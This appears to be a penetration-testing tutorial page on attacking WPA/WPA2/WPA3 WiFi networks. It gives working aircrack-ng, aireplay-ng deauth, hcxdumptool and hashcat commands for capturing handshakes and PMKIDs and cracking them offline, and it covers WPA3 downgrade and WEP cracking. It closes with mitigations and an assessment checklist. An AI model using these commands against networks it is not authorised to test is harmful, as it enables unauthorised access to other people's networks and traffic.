Skip to content

WPA/WPA2/WPA3 Attacks

WPA2-PSK (pre-shared key) is the most common WiFi encryption in homes and SMBs. Its security depends entirely on the password’s strength: the attack is to capture the “handshake” (the encrypted greeting between client and AP on connecting) and then crack it offline by trying passwords. If the key is weak, it falls; if it’s long and random, it’s infeasible. WPA3 improves this with SAE, but still has vectors.

sequenceDiagram
    participant C as Client
    participant AP as Access point
    participant A as Attacker
    A->>C: deauth (forces a reconnect)
    C->>AP: 4-way handshake (on reconnect)
    A->>A: capture the handshake and crack it offline (hashcat -m 22000)

The 4-way handshake is exchanged when a client connects. You must capture it:

# 1) put the card in monitor mode and focus the target AP
airmon-ng start wlan0
airodump-ng -c <channel> --bssid <AP> -w capture wlan0mon
# 2) force a handshake by disconnecting a client (deauth)
aireplay-ng --deauth 5 -a <AP> -c <client> wlan0mon
# 3) airodump shows "WPA handshake: <AP>" when it captures it

With the handshake in the .cap, you try passwords offline:

# aircrack-ng with a dictionary
aircrack-ng -w rockyou.txt -b <AP> capture.cap
# hashcat (faster with GPU): convert the cap to format 22000
hcxpcapngtool -o hash.22000 capture.pcapng
hashcat -m 22000 hash.22000 rockyou.txt
# with rules / masks for patterned passwords
hashcat -m 22000 hash.22000 -a 3 ?u?l?l?l?l?d?d?d?d

The whole attack is offline: the key’s strength decides everything.

There aren’t always connected clients to deauth. The PMKID attack obtains crackable material directly from the AP, with no client or full handshake needed (if the AP allows it):

hcxdumptool -i wlan0mon -o dump.pcapng --enable_status=1
# extract the PMKID and crack it like the handshake
hcxpcapngtool -o hash.22000 dump.pcapng
hashcat -m 22000 hash.22000 rockyou.txt

WPA3 replaces the handshake with SAE (Dragonfly), resistant to offline cracking. But:

# WPA2/WPA3 transition mode: an AP supporting both allows forcing WPA2 (downgrade)
# -> attack as WPA2
# Dragonblood (CVE-2019-9494/9496): flaws in early SAE implementations
# (side-channels, downgrade) -> some crackable
# in practice, well-implemented WPA3-only resists the offline attack

On Enterprise networks there’s no PSK; clients authenticate against a RADIUS. The typical attack is an evil twin with a fake RADIUS that captures credentials (challenge/response, crackable) — covered in wifi-eviltwin.

# WEP is trivial: capture enough IVs and crack
aircrack-ng capture.cap # with enough packets, the key falls in minutes
# still appears on very old devices -> critical finding if present
  • Long, random password (a 15+ character phrase) — it’s the only thing that stops offline cracking in WPA2.
  • Well-implemented WPA3-only (no transition mode if possible); patch firmware (Dragonblood).
  • Disable WPS (makes getting the key without cracking easier, see WPS Attacks) and WEP.
  • Enterprise (802.1X) with EAP-TLS (certificates) instead of PSK; validate the server certificate on clients.
  • 802.11w (PMF) to mitigate the deauth that forces the handshake; monitor mass deauth.
  • Capture the WPA2 handshake (airodump + deauth)
  • Crack offline (aircrack/hashcat -m 22000)
  • PMKID attack if no clients (hcxdumptool)
  • WPA3: transition mode? → downgrade to WPA2
  • Dragonblood on old SAE implementations
  • WEP if present (trivial crack)
  • Enterprise: evil twin RADIUS (Evil Twin and Captive Portals)
  • Assess the key’s strength (real impact)